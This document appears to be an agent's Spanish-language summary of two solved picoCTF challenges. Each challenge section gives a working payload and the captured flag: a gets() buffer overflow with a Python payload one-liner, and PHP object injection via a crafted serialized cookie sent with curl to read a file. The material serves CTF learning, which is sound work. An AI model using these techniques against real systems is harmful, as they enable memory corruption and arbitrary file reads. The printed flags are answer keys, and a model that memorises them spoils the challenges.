╔════════════════════════════════════════════════════════════════════╗
║           RESUMEN DE RETOS PICOCTF COMPLETADOS                     ║
╚════════════════════════════════════════════════════════════════════╝

DIRECTORIO DE TRABAJO: /workspace/recon_tools

═══════════════════════════════════════════════════════════════════════

RETO 1: clutter-overflow
─────────────────────────────────────────────────────────────────────
Tipo:          Binary Exploitation
Dificultad:    4636 usuarios (91% liked)
Servidor:      nc mars.picoctf.net 31890

Vulnerabilidad:
  - Buffer overflow usando gets() sin validación
  - Buffer de 256 bytes + 8 bytes padding
  - Sobrescritura de variable 'code' en el stack

Técnica:
  - Análisis del código fuente C
  - Determinación del offset exacto (264 bytes)
  - Payload: 264 bytes + \xef\xbe\xad\xde (0xdeadbeef en little-endian)

Exploit:
  python3 -c "import sys; sys.stdout.buffer.write(b'A' * 264 + b'\xef\xbe\xad\xde')"

Flag: picoCTF{c0ntr0ll3d_clutt3r_1n_my_buff3r}

Archivos:
  - chall.c (código fuente)
  - chall (binario)
  - exploit_notes.txt (notas detalladas)
  - flag.txt (flag obtenida)

═══════════════════════════════════════════════════════════════════════

RETO 2: Super Serial
─────────────────────────────────────────────────────────────────────
Tipo:          Web Exploitation
Dificultad:    8314 usuarios (85% liked)
URL:           http://mercury.picoctf.net:25395/

Vulnerabilidad:
  - PHP Object Injection vía deserialización insegura
  - Magic method __toString() invocado automáticamente
  - Lectura arbitraria de archivos

Técnica:
  1. Descubrimiento de código fuente (.phps en robots.txt)
  2. Análisis de clases PHP:
     - access_log con __toString() que lee archivos
     - Deserialización de cookie "login" sin validación
  3. Explotación del error handler que concatena objeto
  4. __toString() ejecuta file_get_contents("../flag")

Exploit:
  Payload serializado: O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}
  Base64: TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9
  
  curl http://mercury.picoctf.net:25395/authentication.php \
    -H "Cookie: login=TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9"

Flag: picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_405f4c0e}

Archivos:
  - index.phps, authentication.phps, cookie.phps (código fuente)
  - analysis.txt (análisis de vulnerabilidad)
  - exploit_super_serial.txt (documentación completa)
  - flag_super_serial.txt (flag obtenida)

═══════════════════════════════════════════════════════════════════════

TÉCNICAS Y HERRAMIENTAS UTILIZADAS:
───────────────────────────────────────────────────────────────────────
✓ Análisis de código fuente (C y PHP)
✓ Buffer overflow exploitation
✓ Python para generación de payloads
✓ Conexión remota con sockets y timeout
✓ Web reconnaissance (curl, wget)
✓ PHP deserialization exploitation
✓ Magic methods abuse (__toString)
✓ Base64 encoding/decoding
✓ Little-endian architecture understanding

CUMPLIMIENTO DE REQUISITOS:
───────────────────────────────────────────────────────────────────────
✓ Scripts ejecutados inline (bash -c, python3 -)
✓ Timeout aplicado en conexiones NC
✓ No se crearon archivos de scripts ejecutables
✓ Solo archivos .txt para documentación y flags
✓ Resolución 100% autónoma sin buscar writeups
✓ Razonamiento extenso y análisis detallado

═══════════════════════════════════════════════════════════════════════
